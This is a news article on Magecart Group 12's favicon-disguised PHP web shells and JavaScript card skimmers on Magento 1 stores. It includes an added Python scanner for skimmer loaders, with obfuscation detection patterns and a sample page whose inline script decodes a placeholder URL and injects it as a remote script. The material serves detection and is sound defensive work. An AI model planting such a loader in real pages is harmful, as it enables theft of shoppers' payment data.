Magecart Skimming Tactics Evolve – BankInfoSecurity

Malwarebytes describes updated attack techniques

Prajeet Nair (@prajeetspeaks) •
May 18, 2021

Magecart Group 12, known for skimming payment cards from e-commerce websites using JavaScript skimmers, is using an updated attack technique to gain remote administrative access to sites running older versions of Adobe’s Magento software, according to an analysis by the Malwarebytes Labs Threat Intelligence team.

Magecart Group 12, the latest incarnation of an umbrella of at least seven separate cybercriminal groups, and one that was embroiled in another hacking spree last fall, now uses a technique built on known PHP web shells, tracked under the names Smilodon or Megalodon, Malwarebytes says. The web shells dynamically load JavaScript skimming code into the online store via server-side requests, so the injection is not visible to client-side security tools, and the loaded code then steals payment information.

In previously reported Magecart-type attacks, a malicious skimming script was injected into payment pages, where it captured credit card and personal information and sent it to a remote server, according to an analysis by Trend Micro.

“We found several dozen compromised websites with the exact same template. All of them use Magento version 1,” Jérôme Segura, director of threat intelligence at Malwarebytes, told Information Security Media Group.

“We know that to skim credit card data, attackers can do it either on the client side using JavaScript or on the server side using PHP. However, there are hybrid versions, and this is the case here too,” explains Segura.

In September 2020, researchers warned that around 2,000 sites using the 12-year-old Magento 1 e-commerce platform had been targeted by JavaScript skimmers designed to steal payment card data during the online payment process. (see: Payment Card Skimming Reaches 2,000 Ecommerce Sites).

Imitating an image file

In their recent analysis of websites running Magento 1, Malwarebytes researchers observed new PHP web shells disguised as a favicon (the URL or shortcut icon a browser displays for a site), which they linked to Magecart Group 12. The file, named Magento.png, attempts to pass itself off as “image/png” but does not have the correct PNG format for a valid image file.

“The way it’s injected into compromised sites is to replace the legitimate shortcut icon tags with a path to the bogus PNG file,” Segura explains. “Unlike previous incidents where a fake favicon image was used to hide malicious JavaScript code, it turned out to be a PHP web shell. However, in its current implementation, this PHP script will not load correctly.”

Web shells are malicious scripts planted on a web server that give an attacker persistent remote access and administrative control over the site. “They are usually uploaded to a web server after a vulnerability has been exploited (e.g., SQL injection),” Segura notes.

Malwarebytes says that while there are several ways to load skimming code, the most common is to call an external JavaScript resource. Every time an online customer visits the e-commerce site, their browser makes a request to the domain hosting the skimmer.

Segura adds: “Online stores can detect this type of malware with a server-side scanner, while on the client side you need to have access to the DOM to detect the injected malicious code. One option here is to use a browser extension with heuristic capabilities.”

DOM stands for Document Object Model, which is a cross-platform, language-independent interface that treats an XML or HTML document as a tree structure in which each node is an object representing a part of the document.
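The server-side scanning Segura mentions can be approximated by a pass over the rendered HTML of a store page, looking for the external-script loaders described above and for inline scripts that decode their payload at run time. The Python below is an added example, not Malwarebytes’ scanner: the allowlist of first-party hosts, the hosts ending in .example and the sample page are constructed placeholders, and the obfuscation patterns are coarse indicators to be tuned per site.

```python
"""Added example: server-side scan of a rendered store page for skimmer
loaders. Not Malwarebytes' scanner. Host names ending in .example and the
sample page are constructed placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the shop's own hosts. Any other host serving JavaScript is reported.
FIRST_PARTY_HOSTS = {"shop.example", "cdn.shop.example"}

# Cheap indicators of obfuscated inline JavaScript; tune to your own pages.
OBFUSCATION_PATTERNS = (
    re.compile(r"\batob\s*\(", re.I),
    re.compile(r"String\.fromCharCode\s*\(", re.I),
    re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),        # long base64 blob
    re.compile(r"(?:\\x[0-9a-f]{2}){16,}", re.I),    # long hex-escaped string
)


class _ScriptParser(HTMLParser):
    """Separate <script src=...> references from inline script bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def third_party_hosts(srcs: list[str], allowed: set[str]) -> list[str]:
    """Script URLs whose host is neither empty (a relative path) nor allowlisted.
    Protocol-relative //host/x.js references are resolved like absolute ones."""
    result = []
    for src in srcs:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed:
            result.append(src)
    return result


def scan_page(html: str, allowed: set[str] = FIRST_PARTY_HOSTS) -> dict[str, list[str]]:
    parser = _ScriptParser()
    parser.feed(html)
    return {
        "third_party_scripts": third_party_hosts(parser.external, allowed),
        "suspicious_inline": [s for s in parser.inline
                              if any(p.search(s) for p in OBFUSCATION_PATTERNS)],
    }


# Constructed sample page: two legitimate loads, one foreign host, one benign
# inline script and one inline loader that decodes its target at run time.
SAMPLE_PAGE = """<html><head>
<script type="text/javascript" src="/js/prototype/prototype.js"></script>
<script src="https://cdn.shop.example/skin/frontend/js/checkout.js"></script>
<script src="//static-assets.example/jquery.min.js"></script>
<script>var Translator = new Translate([]);</script>
<script>
  (function(){ var u = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvZy5qcw==");
    var s = document.createElement("script"); s.src = u;
    document.head.appendChild(s); })();
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    report = scan_page(SAMPLE_PAGE)
    for kind, items in report.items():
        print(kind)
        for item in items:
            print("  ", item.strip().splitlines()[0][:80])
```

Run this against pages fetched from the server itself (or rendered by a headless browser, since some loaders only appear after JavaScript runs) and compare the `third_party_scripts` list with a baseline taken from a known-clean deployment; a new host appearing only on the checkout page is the pattern the article describes.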

Widely used Magento

Adobe Magento is one of the most widely used e-commerce platforms in the world, with around 250,000 users, according to Adobe’s website.

Adobe reported in November 2019 that a vulnerability in the Magento Marketplace was exploited by a third party to access account information (see: Magento Marketplace Suffers Data Breach, Adobe Warns).
